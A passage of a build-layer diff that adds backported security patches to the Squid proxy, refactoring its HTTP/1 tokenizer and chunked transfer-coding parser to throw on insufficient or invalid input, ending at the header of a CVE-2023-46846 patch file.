+102,7 @@ LineCharacters() + void + Http::One::Parser::cleanMimePrefix() + { +- Http1::Tokenizer tok(mimeHeaderBlock_); ++ Tokenizer tok(mimeHeaderBlock_); + while (tok.skipOne(RelaxedDelimiterCharacters())) { + (void)tok.skipAll(LineCharacters()); // optional line content + // LF terminator is required. +@@ -137,7 +137,7 @@ Http::One::Parser::cleanMimePrefix() + void + Http::One::Parser::unfoldMime() + { +- Http1::Tokenizer tok(mimeHeaderBlock_); ++ Tokenizer tok(mimeHeaderBlock_); + const auto szLimit = mimeHeaderBlock_.length(); + mimeHeaderBlock_.clear(); + // prevent the mime sender being able to make append() realloc/grow multiple times. +@@ -228,7 +228,7 @@ Http::One::Parser::getHostHeaderField() + debugs(25, 5, "looking for " << name); + + // while we can find more LF in the SBuf +- Http1::Tokenizer tok(mimeHeaderBlock_); ++ Tokenizer tok(mimeHeaderBlock_); + SBuf p; + + while (tok.prefix(p, LineCharacters())) { +@@ -250,7 +250,7 @@ Http::One::Parser::getHostHeaderField() + p.consume(namelen + 1); + + // TODO: optimize SBuf::trim to take CharacterSet directly +- Http1::Tokenizer t(p); ++ Tokenizer t(p); + t.skipAll(CharacterSet::WSP); + p = t.remaining(); + +@@ -278,10 +278,15 @@ Http::One::ErrorLevel() + } + + // BWS = *( SP / HTAB ) ; WhitespaceCharacters() may relax this RFC 7230 rule +-bool +-Http::One::ParseBws(Tokenizer &tok) ++void ++Http::One::ParseBws(Parser::Tokenizer &tok) + { +- if (const auto count = tok.skipAll(Parser::WhitespaceCharacters())) { ++ const auto count = tok.skipAll(Parser::WhitespaceCharacters()); ++ ++ if (tok.atEnd()) ++ throw InsufficientInput(); // even if count is positive ++ ++ if (count) { + // Generating BWS is a MUST-level violation so warn about it as needed. + debugs(33, ErrorLevel(), "found " << count << " BWS octets"); + // RFC 7230 says we MUST parse BWS, so we fall through even if +@@ -289,6 +294,6 @@ Http::One::ParseBws(Tokenizer &tok) + } + // else we successfully "parsed" an empty BWS sequence + +- return true; ++ // success: no more BWS characters expected + } + +--- a/src/http/one/Parser.h ++++ b/src/http/one/Parser.h +@@ -12,6 +12,7 @@ + #include "anyp/ProtocolVersion.h" + #include "http/one/forward.h" + #include "http/StatusCode.h" ++#include "parser/forward.h" + #include "sbuf/SBuf.h" + + namespace Http { +@@ -40,6 +41,7 @@ class Parser : public RefCountable + { + public: + typedef SBuf::size_type size_type; ++ typedef ::Parser::Tokenizer Tokenizer; + + Parser() : parseStatusCode(Http::scNone), parsingStage_(HTTP_PARSE_NONE), hackExpectsMime_(false) {} + virtual ~Parser() {} +@@ -118,11 +120,11 @@ protected: + * detect and skip the CRLF or (if tolerant) LF line terminator + * consume from the tokenizer. + * +- * throws if non-terminator is detected. ++ * \throws exception on bad or InsuffientInput. + * \retval true only if line terminator found. + * \retval false incomplete or missing line terminator, need more data. + */ +- bool skipLineTerminator(Http1::Tokenizer &tok) const; ++ void skipLineTerminator(Tokenizer &) const; + + /** + * Scan to find the mime headers block for current message. +@@ -159,8 +161,8 @@ private: + }; + + /// skips and, if needed, warns about RFC 7230 BWS ("bad" whitespace) +-/// \returns true (always; unlike all the skip*() functions) +-bool ParseBws(Tokenizer &tok); ++/// \throws InsufficientInput when the end of BWS cannot be confirmed ++void ParseBws(Parser::Tokenizer &); + + /// the right debugs() level for logging HTTP violation messages + int ErrorLevel(); +--- a/src/http/one/RequestParser.cc ++++ b/src/http/one/RequestParser.cc +@@ -9,8 +9,8 @@ + #include "squid.h" + #include "Debug.h" + #include "http/one/RequestParser.h" +-#include "http/one/Tokenizer.h" + #include "http/ProtocolVersion.h" ++#include "parser/Tokenizer.h" + #include "profiler/Profiler.h" + #include "SquidConfig.h" + +@@ -64,7 +64,7 @@ Http::One::RequestParser::skipGarbageLin + * RFC 7230 section 2.6, 3.1 and 3.5 + */ + bool +-Http::One::RequestParser::parseMethodField(Http1::Tokenizer &tok) ++Http::One::RequestParser::parseMethodField(Tokenizer &tok) + { + // method field is a sequence of TCHAR. + // Limit to 32 characters to prevent overly long sequences of non-HTTP +@@ -145,7 +145,7 @@ Http::One::RequestParser::RequestTargetC + } + + bool +-Http::One::RequestParser::parseUriField(Http1::Tokenizer &tok) ++Http::One::RequestParser::parseUriField(Tokenizer &tok) + { + /* Arbitrary 64KB URI upper length limit. + * +@@ -178,7 +178,7 @@ Http::One::RequestParser::parseUriField( + } + + bool +-Http::One::RequestParser::parseHttpVersionField(Http1::Tokenizer &tok) ++Http::One::RequestParser::parseHttpVersionField(Tokenizer &tok) + { + static const SBuf http1p0("HTTP/1.0"); + static const SBuf http1p1("HTTP/1.1"); +@@ -253,7 +253,7 @@ Http::One::RequestParser::skipDelimiter( + + /// Parse CRs at the end of request-line, just before the terminating LF. + bool +-Http::One::RequestParser::skipTrailingCrs(Http1::Tokenizer &tok) ++Http::One::RequestParser::skipTrailingCrs(Tokenizer &tok) + { + if (Config.onoff.relaxed_header_parser) { + (void)tok.skipAllTrailing(CharacterSet::CR); // optional; multiple OK +@@ -289,12 +289,12 @@ Http::One::RequestParser::parseRequestFi + // Earlier, skipGarbageLines() took care of any leading LFs (if allowed). + // Now, the request line has to end at the first LF. + static const CharacterSet lineChars = CharacterSet::LF.complement("notLF"); +- ::Parser::Tokenizer lineTok(buf_); ++ Tokenizer lineTok(buf_); + if (!lineTok.prefix(line, lineChars) || !lineTok.skip('\n')) { + if (buf_.length() >= Config.maxRequestHeaderSize) { + /* who should we blame for our failure to parse this line? */ + +- Http1::Tokenizer methodTok(buf_); ++ Tokenizer methodTok(buf_); + if (!parseMethodField(methodTok)) + return -1; // blame a bad method (or its delimiter) + +@@ -308,7 +308,7 @@ Http::One::RequestParser::parseRequestFi + return 0; + } + +- Http1::Tokenizer tok(line); ++ Tokenizer tok(line); + + if (!parseMethodField(tok)) + return -1; +--- a/src/http/one/RequestParser.h ++++ b/src/http/one/RequestParser.h +@@ -54,11 +54,11 @@ private: + bool doParse(const SBuf &aBuf); + + /* all these return false and set parseStatusCode on parsing failures */ +- bool parseMethodField(Http1::Tokenizer &); +- bool parseUriField(Http1::Tokenizer &); +- bool parseHttpVersionField(Http1::Tokenizer &); ++ bool parseMethodField(Tokenizer &); ++ bool parseUriField(Tokenizer &); ++ bool parseHttpVersionField(Tokenizer &); + bool skipDelimiter(const size_t count, const char *where); +- bool skipTrailingCrs(Http1::Tokenizer &tok); ++ bool skipTrailingCrs(Tokenizer &tok); + + bool http0() const {return !msgProtocol_.major;} + static const CharacterSet &RequestTargetCharacters(); +--- a/src/http/one/ResponseParser.cc ++++ b/src/http/one/ResponseParser.cc +@@ -9,8 +9,8 @@ + #include "squid.h" + #include "Debug.h" + #include "http/one/ResponseParser.h" +-#include "http/one/Tokenizer.h" + #include "http/ProtocolVersion.h" ++#include "parser/Tokenizer.h" + #include "profiler/Profiler.h" + #include "SquidConfig.h" + +@@ -47,7 +47,7 @@ Http::One::ResponseParser::firstLineSize + // NP: we found the protocol version and consumed it already. + // just need the status code and reason phrase + int +-Http::One::ResponseParser::parseResponseStatusAndReason(Http1::Tokenizer &tok, const CharacterSet &WspDelim) ++Http::One::ResponseParser::parseResponseStatusAndReason(Tokenizer &tok, const CharacterSet &WspDelim) + { + if (!completedStatus_) { + debugs(74, 9, "seek status-code in: " << tok.remaining().substr(0,10) << "..."); +@@ -87,14 +87,13 @@ Http::One::ResponseParser::parseResponse + static const CharacterSet phraseChars = CharacterSet::WSP + CharacterSet::VCHAR + CharacterSet::OBSTEXT; + (void)tok.prefix(reasonPhrase_, phraseChars); // optional, no error if missing + try { +- if (skipLineTerminator(tok)) { +- debugs(74, DBG_DATA, "parse remaining buf={length=" << tok.remaining().length() << ", data='" << tok.remaining() << "'}"); +- buf_ = tok.remaining(); // resume checkpoint +- return 1; +- } ++ skipLineTerminator(tok); ++ buf_ = tok.remaining(); // resume checkpoint ++ debugs(74, DBG_DATA, Raw("leftovers", buf_.rawContent(), buf_.length())); ++ return 1; ++ } catch (const InsufficientInput &) { + reasonPhrase_.clear(); + return 0; // need more to be sure we have it all +- + } catch (const std::exception &ex) { + debugs(74, 6, "invalid status-line: " << ex.what()); + } +@@ -119,7 +118,7 @@ Http::One::ResponseParser::parseResponse + int + Http::One::ResponseParser::parseResponseFirstLine() + { +- Http1::Tokenizer tok(buf_); ++ Tokenizer tok(buf_); + + const CharacterSet &WspDelim = DelimiterCharacters(); + +--- a/src/http/one/ResponseParser.h ++++ b/src/http/one/ResponseParser.h +@@ -43,7 +43,7 @@ public: + + private: + int parseResponseFirstLine(); +- int parseResponseStatusAndReason(Http1::Tokenizer&, const CharacterSet &); ++ int parseResponseStatusAndReason(Tokenizer&, const CharacterSet &); + + /// magic prefix for identifying ICY response messages + static const SBuf IcyMagic; +--- a/src/http/one/TeChunkedParser.cc ++++ b/src/http/one/TeChunkedParser.cc +@@ -13,10 +13,13 @@ + #include "http/one/Tokenizer.h" + #include "http/ProtocolVersion.h" + #include "MemBuf.h" ++#include "parser/Tokenizer.h" + #include "Parsing.h" ++#include "sbuf/Stream.h" + #include "SquidConfig.h" + +-Http::One::TeChunkedParser::TeChunkedParser() ++Http::One::TeChunkedParser::TeChunkedParser(): ++ customExtensionValueParser(nullptr) + { + // chunked encoding only exists in HTTP/1.1 + Http1::Parser::msgProtocol_ = Http::ProtocolVersion(1,1); +@@ -31,7 +34,11 @@ Http::One::TeChunkedParser::clear() + buf_.clear(); + theChunkSize = theLeftBodySize = 0; + theOut = NULL; +- useOriginBody = -1; ++ // XXX: We do not reset customExtensionValueParser here. Based on the ++ // clear() API description, we must, but it makes little sense and could ++ // break method callers if they appear because some of them may forget to ++ // reset customExtensionValueParser. TODO: Remove Http1::Parser as our ++ // parent class and this unnecessary method with it. + } + + bool +@@ -49,14 +56,14 @@ Http::One::TeChunkedParser::parse(const + if (parsingStage_ == Http1::HTTP_PARSE_NONE) + parsingStage_ = Http1::HTTP_PARSE_CHUNK_SZ; + +- Http1::Tokenizer tok(buf_); ++ Tokenizer tok(buf_); + + // loop for as many chunks as we can + // use do-while instead of while so that we can incrementally + // restart in the middle of a chunk/frame + do { + +- if (parsingStage_ == Http1::HTTP_PARSE_CHUNK_EXT && !parseChunkExtension(tok, theChunkSize)) ++ if (parsingStage_ == Http1::HTTP_PARSE_CHUNK_EXT && !parseChunkMetadataSuffix(tok)) + return false; + + if (parsingStage_ == Http1::HTTP_PARSE_CHUNK && !parseChunkBody(tok)) +@@ -80,7 +87,7 @@ Http::One::TeChunkedParser::needsMoreSpa + + /// RFC 7230 section 4.1 chunk-size + bool +-Http::One::TeChunkedParser::parseChunkSize(Http1::Tokenizer &tok) ++Http::One::TeChunkedParser::parseChunkSize(Tokenizer &tok) + { + Must(theChunkSize <= 0); // Should(), really + +@@ -104,66 +111,75 @@ Http::One::TeChunkedParser::parseChunkSi + return false; // should not be reachable + } + +-/** +- * Parses chunk metadata suffix, looking for interesting extensions and/or +- * getting to the line terminator. RFC 7230 section 4.1.1 and its Errata #4667: +- * +- * chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) +- * chunk-ext-name = token +- * chunk-ext-val = token / quoted-string +- * +- * ICAP 'use-original-body=N' extension is supported. +- */ +-bool +-Http::One::TeChunkedParser::parseChunkExtension(Http1::Tokenizer &tok, bool skipKnown) +-{ +- SBuf ext; +- SBuf value; +- while ( +- ParseBws(tok) && // Bug 4492: IBM_HTTP_Server sends SP after chunk-size +- tok.skip(';') && +- ParseBws(tok) && // Bug 4492: ICAP servers send SP before chunk-ext-name +- tok.prefix(ext, CharacterSet::TCHAR)) { // chunk-ext-name +- +- // whole value part is optional. if no '=' expect next chunk-ext +- if (ParseBws(tok) && tok.skip('=') && ParseBws(tok)) { +- +- if (!skipKnown) { +- if (ext.cmp("use-original-body",17) == 0 && tok.int64(useOriginBody, 10)) { +- debugs(94, 3, "Found chunk extension " << ext << "=" << useOriginBody); +- buf_ = tok.remaining(); // parse checkpoint +- continue; +- } +- } +- +- debugs(94, 5, "skipping unknown chunk extension " << ext); +- +- // unknown might have a value token or quoted-string +- if (tok.quotedStringOrToken(value) && !tok.atEnd()) { +- buf_ = tok.remaining(); // parse checkpoint +- continue; +- } +- +- // otherwise need more data OR corrupt syntax +- break; +- } +- +- if (!tok.atEnd()) +- buf_ = tok.remaining(); // parse checkpoint (unless there might be more token name) +- } +- +- if (skipLineTerminator(tok)) { +- buf_ = tok.remaining(); // checkpoint +- // non-0 chunk means data, 0-size means optional Trailer follows ++/// Parses "[chunk-ext] CRLF" from RFC 7230 section 4.1.1: ++/// chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF ++/// last-chunk = 1*"0" [ chunk-ext ] CRLF ++bool ++Http::One::TeChunkedParser::parseChunkMetadataSuffix(Tokenizer &tok) ++{ ++ // Code becomes much simpler when incremental parsing functions throw on ++ // bad or insufficient input, like in the code below. TODO: Expand up. ++ try { ++ parseChunkExtensions(tok); // a possibly empty chunk-ext list ++ skipLineTerminator(tok); ++ buf_ = tok.remaining(); + parsingStage_ = theChunkSize ? Http1::HTTP_PARSE_CHUNK : Http1::HTTP_PARSE_MIME; + return true; ++ } catch (const InsufficientInput &) { ++ tok.reset(buf_); // backtrack to the last commit point ++ return false; + } ++ // other exceptions bubble up to kill message parsing ++} ++ ++/// Parses the chunk-ext list (RFC 7230 section 4.1.1 and its Errata #4667): ++/// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) ++void ++Http::One::TeChunkedParser::parseChunkExtensions(Tokenizer &tok) ++{ ++ do { ++ ParseBws(tok); // Bug 4492: IBM_HTTP_Server sends SP after chunk-size + +- return false; ++ if (!tok.skip(';')) ++ return; // reached the end of extensions (if any) ++ ++ parseOneChunkExtension(tok); ++ buf_ = tok.remaining(); // got one extension ++ } while (true); ++} ++ ++void ++Http::One::ChunkExtensionValueParser::Ignore(Tokenizer &tok, const SBuf &extName) ++{ ++ const auto ignoredValue = tokenOrQuotedString(tok); ++ debugs(94, 5, extName << " with value " << ignoredValue); ++} ++ ++/// Parses a single chunk-ext list element: ++/// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) ++void ++Http::One::TeChunkedParser::parseOneChunkExtension(Tokenizer &tok) ++{ ++ ParseBws(tok); // Bug 4492: ICAP servers send SP before chunk-ext-name ++ ++ const auto extName = tok.prefix("chunk-ext-name", CharacterSet::TCHAR); ++ ++ ParseBws(tok); ++ ++ if (!tok.skip('=')) ++ return; // parsed a valueless chunk-ext ++ ++ ParseBws(tok); ++ ++ // optimization: the only currently supported extension needs last-chunk ++ if (!theChunkSize && customExtensionValueParser) ++ customExtensionValueParser->parse(tok, extName); ++ else ++ ChunkExtensionValueParser::Ignore(tok, extName); + } + + bool +-Http::One::TeChunkedParser::parseChunkBody(Http1::Tokenizer &tok) ++Http::One::TeChunkedParser::parseChunkBody(Tokenizer &tok) + { + if (theLeftBodySize > 0) { + buf_ = tok.remaining(); // sync buffers before buf_ use +@@ -188,17 +204,20 @@ Http::One::TeChunkedParser::parseChunkBo + } + + bool +-Http::One::TeChunkedParser::parseChunkEnd(Http1::Tokenizer &tok) ++Http::One::TeChunkedParser::parseChunkEnd(Tokenizer &tok) + { + Must(theLeftBodySize == 0); // Should(), really + +- if (skipLineTerminator(tok)) { ++ try { ++ skipLineTerminator(tok); + buf_ = tok.remaining(); // parse checkpoint + theChunkSize = 0; // done with the current chunk + parsingStage_ = Http1::HTTP_PARSE_CHUNK_SZ; + return true; + } +- +- return false; ++ catch (const InsufficientInput &) { ++ return false; ++ } ++ // other exceptions bubble up to kill message parsing + } + +--- a/src/http/one/TeChunkedParser.h ++++ b/src/http/one/TeChunkedParser.h +@@ -18,6 +18,26 @@ namespace Http + namespace One + { + ++using ::Parser::InsufficientInput; ++ ++// TODO: Move this class into http/one/ChunkExtensionValueParser.* ++/// A customizable parser of a single chunk extension value (chunk-ext-val). ++/// From RFC 7230 section 4.1.1 and its Errata #4667: ++/// chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) ++/// chunk-ext-name = token ++/// chunk-ext-val = token / quoted-string ++class ChunkExtensionValueParser ++{ ++public: ++ typedef ::Parser::Tokenizer Tokenizer; ++ ++ /// extracts and ignores the value of a named extension ++ static void Ignore(Tokenizer &tok, const SBuf &extName); ++ ++ /// extracts and then interprets (or ignores) the extension value ++ virtual void parse(Tokenizer &tok, const SBuf &extName) = 0; ++}; ++ + /** + * An incremental parser for chunked transfer coding + * defined in RFC 7230 section 4.1. +@@ -25,7 +45,7 @@ namespace One + * + * The parser shovels content bytes from the raw + * input buffer into the content output buffer, both caller-supplied. +- * Ignores chunk extensions except for ICAP's ieof. ++ * Chunk extensions like use-original-body are handled via parseExtensionValuesWith(). + * Trailers are available via mimeHeader() if wanted. + */ + class TeChunkedParser : public Http1::Parser +@@ -37,6 +57,10 @@ public: + /// set the buffer to be used to store decoded chunk data + void setPayloadBuffer(MemBuf *parsedContent) {theOut = parsedContent;} + ++ /// Instead of ignoring all chunk extension values, give the supplied ++ /// parser a chance to handle them. Only applied to last-chunk (for now). ++ void parseExtensionValuesWith(ChunkExtensionValueParser *parser) { customExtensionValueParser = parser; } ++ + bool needsMoreSpace() const; + + /* Http1::Parser API */ +@@ -45,17 +69,20 @@ public: + virtual Parser::size_type firstLineSize() const {return 0;} // has no meaning with multiple chunks + + private: +- bool parseChunkSize(Http1::Tokenizer &tok); +- bool parseChunkExtension(Http1::Tokenizer &tok, bool skipKnown); +- bool parseChunkBody(Http1::Tokenizer &tok); +- bool parseChunkEnd(Http1::Tokenizer &tok); ++ bool parseChunkSize(Tokenizer &tok); ++ bool parseChunkMetadataSuffix(Tokenizer &); ++ void parseChunkExtensions(Tokenizer &); ++ void parseOneChunkExtension(Tokenizer &); ++ bool parseChunkBody(Tokenizer &tok); ++ bool parseChunkEnd(Tokenizer &tok); + + MemBuf *theOut; + uint64_t theChunkSize; + uint64_t theLeftBodySize; + +-public: +- int64_t useOriginBody; ++ /// An optional plugin for parsing and interpreting custom chunk-ext-val. ++ /// This "visitor" object is owned by our creator. ++ ChunkExtensionValueParser *customExtensionValueParser; + }; + + } // namespace One +--- a/src/http/one/Tokenizer.cc ++++ b/src/http/one/Tokenizer.cc +@@ -8,35 +8,18 @@ + + #include "squid.h" + #include "Debug.h" ++#include "http/one/Parser.h" + #include "http/one/Tokenizer.h" ++#include "parser/Tokenizer.h" ++#include "sbuf/Stream.h" + +-bool +-Http::One::Tokenizer::quotedString(SBuf &returnedToken, const bool http1p0) ++/// Extracts quoted-string after the caller removes the initial '"'. ++/// \param http1p0 whether to prohibit \-escaped characters in quoted strings ++/// \throws InsufficientInput when input can be a token _prefix_ ++/// \returns extracted quoted string (without quotes and with chars unescaped) ++static SBuf ++parseQuotedStringSuffix(Parser::Tokenizer &tok, const bool http1p0) + { +- checkpoint(); +- +- if (!skip('"')) +- return false; +- +- return qdText(returnedToken, http1p0); +-} +- +-bool +-Http::One::Tokenizer::quotedStringOrToken(SBuf &returnedToken, const bool http1p0) +-{ +- checkpoint(); +- +- if (!skip('"')) +- return prefix(returnedToken, CharacterSet::TCHAR); +- +- return qdText(returnedToken, http1p0); +-} +- +-bool +-Http::One::Tokenizer::qdText(SBuf &returnedToken, const bool http1p0) +-{ +- // the initial DQUOTE has been skipped by the caller +- + /* + * RFC 1945 - defines qdtext: + * inclusive of LWS (which includes CR and LF) +@@ -61,12 +44,17 @@ Http::One::Tokenizer::qdText(SBuf &retur + // best we can do is a conditional reference since http1p0 value may change per-client + const CharacterSet &tokenChars = (http1p0 ? qdtext1p0 : qdtext1p1); + +- for (;;) { +- SBuf::size_type prefixLen = buf().findFirstNotOf(tokenChars); +- returnedToken.append(consume(prefixLen)); ++ SBuf parsedToken; ++ ++ while (!tok.atEnd()) { ++ SBuf qdText; ++ if (tok.prefix(qdText, tokenChars)) ++ parsedToken.append(qdText); ++ ++ if (!http1p0 && tok.skip('\\')) { // HTTP/1.1 allows quoted-pair, HTTP/1.0 does not ++ if (tok.atEnd()) ++ break; + +- // HTTP/1.1 allows quoted-pair, HTTP/1.0 does not +- if (!http1p0 && skip('\\')) { + /* RFC 7230 section 3.2.6 + * + * The backslash octet ("\") can be used as a single-octet quoting +@@ -78,32 +66,42 @@ Http::One::Tokenizer::qdText(SBuf &retur + */ + static const CharacterSet qPairChars = CharacterSet::HTAB + CharacterSet::SP + CharacterSet::VCHAR + CharacterSet::OBSTEXT; + SBuf escaped; +- if (!prefix(escaped, qPairChars, 1)) { +- returnedToken.clear(); +- restoreLastCheckpoint(); +- return false; +- } +- returnedToken.append(escaped); ++ if (!tok.prefix(escaped, qPairChars, 1)) ++ throw TexcHere("invalid escaped character in quoted-pair"); ++ ++ parsedToken.append(escaped); + continue; ++ } + +- } else if (skip('"')) { +- break; // done ++ if (tok.skip('"')) ++ return parsedToken; // may be empty + +- } else if (atEnd()) { +- // need more data +- returnedToken.clear(); +- restoreLastCheckpoint(); +- return false; +- } ++ if (tok.atEnd()) ++ break; + +- // else, we have an error +- debugs(24, 8, "invalid bytes for set " << tokenChars.name); +- returnedToken.clear(); +- restoreLastCheckpoint(); +- return false; ++ throw TexcHere(ToSBuf("invalid bytes for set ", tokenChars.name)); + } + +- // found the whole string +- return true; ++ throw Http::One::InsufficientInput(); ++} ++ ++SBuf ++Http::One::tokenOrQuotedString(Parser::Tokenizer &tok, const bool http1p0) ++{ ++ if (tok.skip('"')) ++ return parseQuotedStringSuffix(tok, http1p0); ++ ++ if (tok.atEnd()) ++ throw InsufficientInput(); ++ ++ SBuf parsedToken; ++ if (!tok.prefix(parsedToken, CharacterSet::TCHAR)) ++ throw TexcHere("invalid input while expecting an HTTP token"); ++ ++ if (tok.atEnd()) ++ throw InsufficientInput(); ++ ++ // got the complete token ++ return parsedToken; + } + +--- a/src/http/one/Tokenizer.h ++++ b/src/http/one/Tokenizer.h +@@ -9,68 +9,47 @@ + #ifndef SQUID_SRC_HTTP_ONE_TOKENIZER_H + #define SQUID_SRC_HTTP_ONE_TOKENIZER_H + +-#include "parser/Tokenizer.h" ++#include "parser/forward.h" ++#include "sbuf/forward.h" + + namespace Http { + namespace One { + + /** +- * Lexical processor extended to tokenize HTTP/1.x syntax. ++ * Extracts either an HTTP/1 token or quoted-string while dealing with ++ * possibly incomplete input typical for incremental text parsers. ++ * Unescapes escaped characters in HTTP/1.1 quoted strings. + * +- * \see ::Parser::Tokenizer for more detail ++ * \param http1p0 whether to prohibit \-escaped characters in quoted strings ++ * \throws InsufficientInput as appropriate, including on unterminated tokens ++ * \returns extracted token or quoted string (without quotes) ++ * ++ * Governed by: ++ * - RFC 1945 section 2.1 ++ * " ++ * A string of text is parsed as a single word if it is quoted using ++ * double-quote marks. ++ * ++ * quoted-string = ( <"> *(qdtext) <"> ) ++ * ++ * qdtext = <any CHAR except <"> and CTLs, ++ * but including LWS> ++ * ++ * Single-character quoting using the backslash ("\") character is not ++ * permitted in HTTP/1.0. ++ * " ++ * ++ * - RFC 7230 section 3.2.6 ++ * " ++ * A string of text is parsed as a single value if it is quoted using ++ * double-quote marks. ++ * ++ * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE ++ * qdtext = HTAB / SP /%x21 / %x23-5B / %x5D-7E / obs-text ++ * obs-text = %x80-FF ++ * " + */ +-class Tokenizer : public ::Parser::Tokenizer +-{ +-public: +- Tokenizer(SBuf &s) : ::Parser::Tokenizer(s), savedStats_(0) {} +- +- /** +- * Attempt to parse a quoted-string lexical construct. +- * +- * Governed by: +- * - RFC 1945 section 2.1 +- * " +- * A string of text is parsed as a single word if it is quoted using +- * double-quote marks. +- * +- * quoted-string = ( <"> *(qdtext) <"> ) +- * +- * qdtext = <any CHAR except <"> and CTLs, +- * but including LWS> +- * +- * Single-character quoting using the backslash ("\") character is not +- * permitted in HTTP/1.0. +- * " +- * +- * - RFC 7230 section 3.2.6 +- * " +- * A string of text is parsed as a single value if it is quoted using +- * double-quote marks. +- * +- * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE +- * qdtext = HTAB / SP /%x21 / %x23-5B / %x5D-7E / obs-text +- * obs-text = %x80-FF +- * " +- * +- * \param escaped HTTP/1.0 does not permit \-escaped characters +- */ +- bool quotedString(SBuf &value, const bool http1p0 = false); +- +- /** +- * Attempt to parse a (token / quoted-string ) lexical construct. +- */ +- bool quotedStringOrToken(SBuf &value, const bool http1p0 = false); +- +-private: +- /// parse the internal component of a quote-string, and terminal DQUOTE +- bool qdText(SBuf &value, const bool http1p0); +- +- void checkpoint() { savedCheckpoint_ = buf(); savedStats_ = parsedSize(); } +- void restoreLastCheckpoint() { undoParse(savedCheckpoint_, savedStats_); } +- +- SBuf savedCheckpoint_; +- SBuf::size_type savedStats_; +-}; ++SBuf tokenOrQuotedString(Parser::Tokenizer &tok, const bool http1p0 = false); + + } // namespace One + } // namespace Http +--- a/src/http/one/forward.h ++++ b/src/http/one/forward.h +@@ -10,6 +10,7 @@ + #define SQUID_SRC_HTTP_ONE_FORWARD_H + + #include "base/RefCount.h" ++#include "parser/forward.h" + #include "sbuf/forward.h" + + namespace Http { +@@ -31,6 +32,8 @@ typedef RefCount<Http::One::ResponsePars + /// CRLF textual representation + const SBuf &CrLf(); + ++using ::Parser::InsufficientInput; ++ + } // namespace One + } // namespace Http + +--- a/src/parser/BinaryTokenizer.h ++++ b/src/parser/BinaryTokenizer.h +@@ -9,6 +9,7 @@ + #ifndef SQUID_SRC_PARSER_BINARYTOKENIZER_H + #define SQUID_SRC_PARSER_BINARYTOKENIZER_H + ++#include "parser/forward.h" + #include "sbuf/SBuf.h" + + namespace Parser +@@ -44,7 +45,7 @@ public: + class BinaryTokenizer + { + public: +- class InsufficientInput {}; // thrown when a method runs out of data ++ typedef ::Parser::InsufficientInput InsufficientInput; + typedef uint64_t size_type; // enough for the largest supported offset + + BinaryTokenizer(); +--- a/src/parser/Makefile.am ++++ b/src/parser/Makefile.am +@@ -13,6 +13,7 @@ noinst_LTLIBRARIES = libparser.la + libparser_la_SOURCES = \ + BinaryTokenizer.h \ + BinaryTokenizer.cc \ ++ forward.h \ + Tokenizer.h \ + Tokenizer.cc + +--- a/src/parser/Tokenizer.cc ++++ b/src/parser/Tokenizer.cc +@@ -10,7 +10,9 @@ + + #include "squid.h" + #include "Debug.h" ++#include "parser/forward.h" + #include "parser/Tokenizer.h" ++#include "sbuf/Stream.h" + + #include <cerrno> + #if HAVE_CTYPE_H +@@ -96,6 +98,23 @@ Parser::Tokenizer::prefix(SBuf &returned + return true; + } + ++SBuf ++Parser::Tokenizer::prefix(const char *description, const CharacterSet &tokenChars, const SBuf::size_type limit) ++{ ++ if (atEnd()) ++ throw InsufficientInput(); ++ ++ SBuf result; ++ ++ if (!prefix(result, tokenChars, limit)) ++ throw TexcHere(ToSBuf("cannot parse ", description)); ++ ++ if (atEnd()) ++ throw InsufficientInput(); ++ ++ return result; ++} ++ + bool + Parser::Tokenizer::suffix(SBuf &returnedToken, const CharacterSet &tokenChars, const SBuf::size_type limit) + { +@@ -283,3 +302,24 @@ Parser::Tokenizer::int64(int64_t & resul + return success(s - range.rawContent()); + } + ++int64_t ++Parser::Tokenizer::udec64(const char *description, const SBuf::size_type limit) ++{ ++ if (atEnd()) ++ throw InsufficientInput(); ++ ++ int64_t result = 0; ++ ++ // Since we only support unsigned decimals, a parsing failure with a ++ // non-empty input always implies invalid/malformed input (or a buggy ++ // limit=0 caller). TODO: Support signed and non-decimal integers by ++ // refactoring int64() to detect insufficient input. ++ if (!int64(result, 10, false, limit)) ++ throw TexcHere(ToSBuf("cannot parse ", description)); ++ ++ if (atEnd()) ++ throw InsufficientInput(); // more digits may be coming ++ ++ return result; ++} ++ +--- a/src/parser/Tokenizer.h ++++ b/src/parser/Tokenizer.h +@@ -143,6 +143,19 @@ public: + */ + bool int64(int64_t &result, int base = 0, bool allowSign = true, SBuf::size_type limit = SBuf::npos); + ++ /* ++ * The methods below mimic their counterparts documented above, but they ++ * throw on errors, including InsufficientInput. The field description ++ * parameter is used for error reporting and debugging. ++ */ ++ ++ /// prefix() wrapper but throws InsufficientInput if input contains ++ /// nothing but the prefix (i.e. if the prefix is not "terminated") ++ SBuf prefix(const char *description, const CharacterSet &tokenChars, SBuf::size_type limit = SBuf::npos); ++ ++ /// int64() wrapper but limited to unsigned decimal integers (for now) ++ int64_t udec64(const char *description, SBuf::size_type limit = SBuf::npos); ++ + protected: + SBuf consume(const SBuf::size_type n); + SBuf::size_type success(const SBuf::size_type n); +--- /dev/null ++++ b/src/parser/forward.h +@@ -0,0 +1,22 @@ ++/* ++ * Copyright (C) 1996-2019 The Squid Software Foundation and contributors ++ * ++ * Squid software is distributed under GPLv2+ license and includes ++ * contributions from numerous individuals and organizations. ++ * Please see the COPYING and CONTRIBUTORS files for details. ++ */ ++ ++#ifndef SQUID_PARSER_FORWARD_H ++#define SQUID_PARSER_FORWARD_H ++ ++namespace Parser { ++class Tokenizer; ++class BinaryTokenizer; ++ ++// TODO: Move this declaration (to parser/Elements.h) if we need more like it. ++/// thrown by modern "incremental" parsers when they need more data ++class InsufficientInput {}; ++} // namespace Parser ++ ++#endif /* SQUID_PARSER_FORWARD_H */ ++ diff --git a/meta-networking/recipes-daemons/squid/files/CVE-2023-46846.patch b/meta-networking/recipes-daemons/squid/files/CVE-2023-46846.patch new file mode 100644 index 0000000000..a6d0965e7a --- /dev/null +++ b/meta-networking/recipes-daemons/squid/files/CVE-2023-46846.patch @@ -0,0 +1,169 @@ +From 05f6af2f4c85cc99323cfff6149c3d74af661b6d Mon Sep 17 00:00:00 2001 +From: Amos Jeffries 